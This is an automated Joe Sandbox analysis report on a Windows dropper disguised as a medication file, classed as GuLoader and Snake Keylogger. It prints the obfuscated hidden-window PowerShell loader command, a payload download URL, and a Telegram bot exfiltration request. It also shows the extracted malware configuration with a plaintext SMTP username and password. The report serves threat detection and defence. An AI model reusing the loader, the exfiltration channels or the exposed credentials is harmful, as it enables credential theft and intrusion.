Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Apixaban - August 2024.exe

Overview

General Information

Sample name:Apixaban - August 2024.exe
Analysis ID:1481493
MD5:0e198c53ce387336130be0c8ad27b7af
SHA1:ae1762434fbafe22f064eba92398f4c118969efd
SHA256:53cf1c4a06b8846e9abf3d97f46fa3cd6c50bdf1fe7c46aa64b65960eb456484
Tags:exesigned
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell drops PE file
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • Apixaban - August 2024.exe (PID: 1632 cmdline: "C:\Users\user\Desktop\Apixaban - August 2024.exe" MD5: 0E198C53CE387336130BE0C8AD27B7AF)
    • powershell.exe (PID: 332 cmdline: "powershell.exe" -windowstyle hidden "$nonrationally=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Kompottens.Sub';$Blgekams=$nonrationally.SubString(70407,3);.$Blgekams($nonrationally) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wab.exe (PID: 1372 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "mario@electromac.com.bo", "Password": "Amor1950narciso", "Host": "mail.electromac.com.bo", "Port": "587"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.2653419991.00000000251E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000002.00000002.2247218971.000000000925B000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: wab.exe PID: 1372JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: wab.exe PID: 1372JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Suspicious Script Execution From Temp Folder
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell.exe" -windowstyle hidden "$nonrationally=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Kompottens.Sub';$Blgekams=$nonrationally.SubString(70407,3);.$Blgekams($nonrationally) ", CommandLine: "powershell.exe" -windowstyle hidden "$nonrationally=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Kompottens.Sub';$Blgekams=$nonrationally.SubString(70407,3);.$Blgekams($nonrationally) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Apixaban - August 2024.exe", ParentImage: C:\Users\user\Desktop\Apixaban - August 2024.exe, ParentProcessId: 1632, ParentProcessName: Apixaban - August 2024.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$nonrationally=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Kompottens.Sub';$Blgekams=$nonrationally.SubString(70407,3);.$Blgekams($nonrationally) ", ProcessId: 332, ProcessName: powershell.exe
          Sigma detected: Suspicious Outbound SMTP Connections
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 192.185.142.133, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Program Files (x86)\Windows Mail\wab.exe, Initiated: true, ProcessId: 1372, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49728
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$nonrationally=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Kompottens.Sub';$Blgekams=$nonrationally.SubString(70407,3);.$Blgekams($nonrationally) ", CommandLine: "powershell.exe" -windowstyle hidden "$nonrationally=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Kompottens.Sub';$Blgekams=$nonrationally.SubString(70407,3);.$Blgekams($nonrationally) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Apixaban - August 2024.exe", ParentImage: C:\Users\user\Desktop\Apixaban - August 2024.exe, ParentProcessId: 1632, ParentProcessName: Apixaban - August 2024.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$nonrationally=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Kompottens.Sub';$Blgekams=$nonrationally.SubString(70407,3);.$Blgekams($nonrationally) ", ProcessId: 332, ProcessName: powershell.exe

          Snort Signatures

          No Snort rule has matched

          Suricata Signatures

          Timestamp:2024-07-25T10:06:05.630649+0200
          SID:2803274
          Source Port:49714
          Destination Port:80
          Protocol:TCP
          Classtype:Potentially Bad Traffic
          Timestamp:2024-07-25T10:06:04.021229+0200
          SID:2803274
          Source Port:49711
          Destination Port:80
          Protocol:TCP
          Classtype:Potentially Bad Traffic
          Timestamp:2024-07-25T10:05:28.551868+0200
          SID:2022930
          Source Port:443
          Destination Port:49709
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:2024-07-25T10:04:50.521072+0200
          SID:2022930
          Source Port:443
          Destination Port:49707
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:2024-07-25T10:06:04.608960+0200
          SID:2803305
          Source Port:49713
          Destination Port:443
          Protocol:TCP
          Classtype:Unknown Traffic
          Timestamp:2024-07-25T10:05:56.111324+0200
          SID:2803270
          Source Port:49710
          Destination Port:443
          Protocol:TCP
          Classtype:Potentially Bad Traffic
          Timestamp:2024-07-25T10:06:24.014341+0200
          SID:2803305
          Source Port:49726
          Destination Port:443
          Protocol:TCP
          Classtype:Unknown Traffic
          Timestamp:2024-07-25T10:06:00.193954+0200
          SID:2803274
          Source Port:49711
          Destination Port:80
          Protocol:TCP
          Classtype:Potentially Bad Traffic

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 0000000A.00000002.2653419991.00000000251E1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "mario@electromac.com.bo", "Password": "Amor1950narciso", "Host": "mail.electromac.com.bo", "Port": "587"}
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Usurpatoren\Apixaban - August 2024.exeReversingLabs: Detection: 52%
          Multi AV Scanner detection for submitted file
          Source: Apixaban - August 2024.exeReversingLabs: Detection: 52%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

          Location Tracking

          barindex
          Tries to detect the country of the analysis system (by using the IP)
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_277886DC CryptUnprotectData,10_2_277886DC
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_27788EF1 CryptUnprotectData,10_2_27788EF1
          Source: Apixaban - August 2024.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49712 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 108.167.181.251:443 -> 192.168.2.8:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49727 version: TLS 1.2
          Source: Binary string: tem.Core.pdb7 source: powershell.exe, 00000002.00000002.2242741038.0000000007667000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2242741038.0000000007647000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000002.00000002.2242741038.0000000007647000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: qm.Core.pdbn3 source: powershell.exe, 00000002.00000002.2242741038.0000000007667000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeCode function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405770
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeCode function: 0_2_0040622B FindFirstFileW,FindClose,0_2_0040622B
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 0251F2EDh10_2_0251F33C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 0251F2EDh10_2_0251F150
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 0251FAA9h10_2_0251F804
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 27787EB5h10_2_27787B78
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 27789280h10_2_27788FB0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 2778E416h10_2_2778E148
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 27782A01h10_2_27782758
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 277855D1h10_2_27785328
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 277879C9h10_2_27787720
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 2778B1E6h10_2_2778AF18
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 2778D1D6h10_2_2778CF08
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 277825A9h10_2_27782300
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 27785E81h10_2_27785BD8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 27782E59h10_2_27782BB0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 2778B676h10_2_2778B3A8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 2778D666h10_2_2778D398
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 2778F656h10_2_2778F388
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 27785A29h10_2_27785780
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 27784D21h10_2_27784A78
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 2778CD46h10_2_2778CA78
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 27787119h10_2_27786E70
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 2778ED36h10_2_2778EA68
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 27781CF9h10_2_27781A50
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 277848C9h10_2_27784620
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 27786CC1h10_2_27786A18
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 2778F1C6h10_2_2778EEF8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 27785179h10_2_27784ED0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 27787571h10_2_277872C8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 27782151h10_2_27781EA8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 2778C426h10_2_2778C158
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 27780FF1h10_2_27780D48
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 277818A1h10_2_277815F8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 2778C8B6h10_2_2778C5E8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 2778E8A6h10_2_2778E5D8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 27781449h10_2_277811A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 27783709h10_2_27783460
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 277802E9h10_2_27780040
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 2778BB06h10_2_2778B838
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 277862D9h10_2_27786030
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 2778DAF6h10_2_2778D828
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 2778FAE6h10_2_2778F818
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 27780B99h10_2_277808F0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 2778BF96h10_2_2778BCC8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 2778DF86h10_2_2778DCB8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 27780741h10_2_27780498
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then mov esp, ebp10_2_2778AC90
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 27786733h10_2_27786488
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then mov esp, ebp10_2_2778AC8B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 277832B1h10_2_2778308E

          Networking

          barindex
          Uses the Telegram API (likely for C&C communication)
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:061544%0D%0ADate%20and%20Time:%2026/07/2024%20/%2003:56:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20061544%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
          Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /wp-includes/yPrtLahZfwrl128.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.reap.skyestates.com.mtCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49712 version: TLS 1.0
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /wp-includes/yPrtLahZfwrl128.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.reap.skyestates.com.mtCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:061544%0D%0ADate%20and%20Time:%2026/07/2024%20/%2003:56:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20061544%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: www.reap.skyestates.com.mt
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficDNS traffic detected: DNS query: mail.electromac.com.bo
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 25 Jul 2024 08:06:24 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: wab.exe, 0000000A.00000002.2653419991.0000000025357000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
          Source: wab.exe, 0000000A.00000002.2653419991.0000000025380000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2653419991.0000000025357000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://electromac.com.bo
          Source: wab.exe, 0000000A.00000002.2653419991.0000000025380000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2653419991.0000000025357000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.electromac.com.bo
          Source: Apixaban - August 2024.exe, 00000000.00000000.1382639575.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Apixaban - August 2024.exe, 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: powershell.exe, 00000002.00000002.2241111452.0000000005E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000002.00000002.2238762105.0000000004F76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: wab.exe, 0000000A.00000002.2640536687.0000000009672000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2656016294.00000000274BF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2653419991.0000000025357000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2656016294.00000000274CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r10.i.lencr.org/01
          Source: wab.exe, 0000000A.00000002.2640536687.0000000009672000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2656016294.00000000274BF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2653419991.0000000025357000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2656016294.00000000274CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r10.o.lencr.org0#
          Source: powershell.exe, 00000002.00000002.2238762105.0000000004E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000002.00000002.2238762105.0000000004F76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
